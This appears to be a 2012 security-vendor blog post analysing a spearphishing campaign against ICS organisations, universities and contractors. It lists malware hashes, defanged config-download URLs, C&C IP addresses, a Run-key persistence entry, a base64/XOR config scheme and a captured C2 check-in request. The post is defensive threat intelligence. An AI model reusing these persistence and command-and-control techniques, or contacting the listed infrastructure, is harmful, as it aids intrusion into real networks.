Unveiling a spearphishing campaign and possible ramifications

June 12, 2012 | Jaime Blasco
X

Get the latest security news in your inbox.

Subscribe via Email

No thanks. Close this now.

A few days ago, DigitalBond published information about an ongoing spearphishing campaign that affected one of their employees.

The attackers were using a pdf document related to ICS (Industrial Control Systems) security as a lure to compromise potential targets within the ICS community.

After analyzing the initial information provided, my friend Rubén Santamarta from IOActive and I investigated further on the binaries and the involved infrastructure.

Analysis of the malware

As described in this analysis done by the DigitalBond folks, the mail contained a link to a zip file hosted on hxxp://research.digitalvortex.com/

Once uncompressed, the file Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.pdf.exe (c6b95b178188b8c35d14bed40520e685)

https://www.virustotal.com/file/883b274e5f79f47e5d75afa940eb0c99d4a77526137cbc9a0af1581875e99b0d/analysis/

The file is a WinRAR SFX archive that will unpack the malware files to the user’s Temp folder as well as showing the benign PDF file Lev​era​gin​g_E​the​rne​t_C​ard​_Vu​lne​rab​ili​tie​s_i​n_F​iel​d_D​evi​ces​.pd​f.

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\spoolsvr.exe (md5: 5ff3269faca4a67d1a4c537154aaad4b)

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.pdf

The dropped file spoolsvr.exe,

https://www.virustotal.com/file/466bb7da773c7c200f87a8a06f143c6c6856e9ebc4347eb4afb096104bcd97b4/analysis/

 

The malware also creates a registry key to maintain persistence:

HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run

load = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\spoolsvr.exe

The file is a downloader that reads the configuration file from a remote server, in this case:

hxxp://hint.happyforever.com/logo.html

203.231.234.23

203.226.0.0 - 203.231.255.255

KRNIC

Korea Network Information Center

As described in the DigitalBond’s analysis, the html file contains configuration values within the html tags. The config values are encoded with base64 and then XORED with the key 0x42.

In this file, the values are as follow:

<head>download:;sleep:20;</head>

<title>tanghl.exe</title>

and the body contains a PE File with a new malware.

You can use a small script I created to automatically extract http://alienvault-labs-garage.googlecode.com/files/parse_html_content.py [no longer available] the config values and the binary file from the html content giving the XOR key used. Example:

$ python parse_html_content.py logo.html 42

download:;sleep:20;

tanghl.exe

Binary file logo.html.exe saved

The downloaded file tanghl.exe, is only detected by 3 AV engines:

https://www.virustotal.com/file/0eb7590c2188d995fb3f8394ee10db5856542cfac3a62fd3c8e54236f5ffd428/analysis/

This file is a RAT (Remote Access Tool) known as Backdoor:Win32/Dalbot.gen

This particulary sample connects to the C&C server 1.234.1.68

1.224.0.0 - 1.255.255.255

SK Broadband Co Ltd

Jung-gu SK NamsanGreen Bldg,Namdaemunno 5(o)-ga, Seoul

The communication between the malware and the C&C is done using HTTP requests to random numeric .asp files  . The RAT communication is present on the Cookie header of the request and base64/xor encoded.

GET /8223.asp HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

Host: 1.234.1.68

Connection: Keep-Alive

Cookie: CAQGBgoFD1YaHA4ZH1AIBwIOBR8ADhJWU1pcXlADBBgfBQoGDlYDCgUeDgcORgkIXVtcWVtQ

If we decode the value of the Cookie header (decode base64 and XOR and 1 byte XOR 0x6b) we can see the actual checkin:

command=qwert;clientkey=8175;hostname=XXXXXX;

Further investigations of the campaign

Using the information extracted from the binaries and the servers involved on the attack, we were able to identified more files and campaigns launched by this group during the last months.

The following binary (Romneys_Partner_Choice.exe, md5: 6306364c58f31a711c410c9a874f103c) downloads the config file from:

hxxp://update.slowblog.com/images/logo.png

The server update.slowblog.com was pointing to the same ip as hint.happyforever.com (203.231.234.23) and drops the following benign PDF file, Romneys_Partner_Choice.pdf.

Another file is f77852b73dfde33ea248df7087671f53 that downloads the config file from

httpx://report.rawcomp.com/images/wait.png that also points to 203.231.234.23

and drops China’s_Rare-Earth_Industry.pdf.

Looking for other binaries connecting to the C&C ip address 1.234.1.68 we found the following:

53ae642408aaf6cfed016422b394b32a whose filename is the_list_of_staff_changes_in_anakam.exe

It downloads the config file from

hxxp://report.crabdance.com/report/news.html

210.249.80.141

210.248.0.0 - 210.255.255.255

Japan Network Information Center

The following files were getting the config file from the same server (report.crabdance.com):

MD5 (New_Chertoff_Group_Q1_2012_Report.zip) = e7b5596a08bda3592ed3978ef8d5bcdd

MD5 (Speeches_For_IT-SCC_Meeting.zip) = 094c72273d716302705218eea8b7829e

MD5 (Staff_Changes(URI).zip) = 6725ea60e45b85a63e0dd35f50b50a24

MD5 (Staff_Changes(cmu).zip) = cae33614eb014ed50ab5e1381547bd4a

MD5 (Staff_Changes(purdue).zip) = f108cacaaae8295d9fc602c51bef59cf

MD5 (New_NJVC_First_Half_2012_Report.zip) = 8f26609c275e0262b4833ccc7909779c

dropping the following exes:

MD5 (New NJVC First Half 2012 Report.exe) = f7aa931de0564f77b27c2f5d1d9bc532

MD5 (Any_Staff_Changes_About_Carnegie_Mellon_University.exe) = 8873f6d3ea123708615e72fe357808e5

MD5 (Any_Staff_Changes_About_Purdue_University.exe) = 8873f6d3ea123708615e72fe357808e5

MD5 (Any_Staff_Changes_About_University_of_Rhode_Island.exe) = 8873f6d3ea123708615e72fe357808e5

MD5 (New_Chertoff_Group_Q1_2012_Report.exe) = 59e74b14f5edee8d38eba74a8000fb18

MD5 (Speeches_For_IT-SCC_Meeting.exe) = 59e74b14f5edee8d38eba74a8000fb18

This downloaders obtain the config file from

hxxp://report.crabdance.com/report/news.html

hxxp://203.200.205.245/java/careers.html

hxxp://203.200.205.245/css/style.html

All of them obtain the same RAT and the following C&C ip addresses were present on the binaries:

1.234.1.68:80

143.89.35.7:80

143.89.0.0 - 143.89.255.255

Hong Kong University of Science and Technology

128.175.21.189:80

sql1.be.udel.edu (128.175.21.189)

128.175.0.0 - 128.175.255.255

Information Technologies

192 South Chapel Street

Newark, DE

US

More binaries were found connecting to the ip address 128.175.21.189:

1d8ff16257181562aec3a74ca79ce092 that drops the following doc file:

DRAFT_NEMA_Welcomes_Congressional_Approval_of_Legislation_Directing_DOT_to_Harmonize_with_International_Standards.doc

and gets the config file from release.pornandpot.com (128.175.21.189)

a8b2ac446c614fd5d4880d95369deb3b

hxxp://www.doversolutions.co.in/images/title.png (203.200.205.245)

81848edc70fa647789d78c1610b93135

hxp://203.200.205.245/images/title.png (203.200.205.245)

8e3210d90e728cad7691a4ada11568a0

hxp://203.200.205.245/images/title.png (203.200.205.245)

c12699e9ff4e150c10bcbd62219f2af6

hxxp://203.200.205.245/images/google.png

hxxp://173.10.48.242/html/WINWORD.gif

 and use 74.93.92.50 as the C&C server.
 
9a4cf6b89ce11566f7048223fb8cf638

hxxp://203.200.205.245/postinfo.html

36fec0bf34b49c09ec8d6cf12205953c

http://203.200.205.245/default.htm

Other files connecting to the C&C server  74.93.92.50:

013649078c6498d27aa37ac8a739b20f

0e087ef59f698c7807e268759a3bbc71
 
Using the script to extract the information from the html config files, we found the following different configuration values:
 

sleep:122;

AcroRd32.exe

download:;

AcroRd32.exe

download:;sleep:20;

tanghl.exe

sleep:240;

Windows.exe

download:;

AcroRd32.exe

sleep:124;

ntdll.exe

sleep:20;

AcroRd32.exe

download:;

WINWORD.EXE

sleep:20;

WINWORD.EXE

Final notes

We have identified that the group behind these attacks is using hacked web servers to host the malicious configuration files. Based on the networks hosting the C&C ips (mainly universities), it is very likely that these servers are also hacked and some kind of proxy is installed on them to redirect the traffic to the real C&C server. This can be easily achieve using HTran or other similar software commonly used by Chinese hacker groups in this kind of campaigns.

If we take a look at the name of the identified files, we can build a short list of likely targets and/or their customers:

- Universities (Carnegie Mellon, Purdue University, Rhode Island)

- ICS related organizations (DigitalBond, NEMA [National Electrical Manufacturers Association])

- Government contractors (NJVC, Chertoff Group)

- Two-Factor Authentication technology (Anakam).

The usage of configuration values inside HTML content is somehow similar to what attackers used during the Operation Shady RAT.

Apart from the modus operandi, we identified the C&C server 74.93.92.50. Based on the information provided on the following links:

http://www.secureworks.com/research/threats/htran/

http://pastebin.com/yKSQd5Z5

It seems that ip is somehow related to the group behind the RSA breach.

If you remember, a month ago, the ICS-CERT published a note warning on a series of cyber intrusions targeting natural gas pipeline companies. Some days after that, information about a link between this attacks and the RSA breach was published. “The indicators DHS provided to hunt for the gas-pipeline attackers included several that, when we checked them, turned out to be related to those used by the perpetrators of the RSA attack,”  you can read on the article.

One way or another, it seems that ICS companies are beginning to be included in the shopping list of these kind of groups.

You can also use the following OpenIOC file http://alienvault-labs-garage.googlecode.com/files/d3b52fea-5020-469c-97f8-b23bf4954751.ioc [no longer available] that contains the indicators of compromise related to the data presented:

You can find more information  at  IOActive blog 

Jaime Blasco

About the Author: Jaime Blasco
Jaime Blasco is a renowned Security Researcher with broad experience in network security, malware analysis and incident response. At AlienVault, Jaime leads the Lab Intelligence and Research team that leads the charge of researching and integrating threat intelligence into detection mechanisms. Prior to working at AlienVault he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. He is based in San Francisco. Jaime's work in emerging threats and targeted attacks is frequently cited in international publications such as New York Times, BBC, Washington Post and Al Jazeera.
Read more posts from Jaime Blasco ›

‹ BACK TO ALL BLOGS

Watch a Demo ›
GET PRICE FREE TRIAL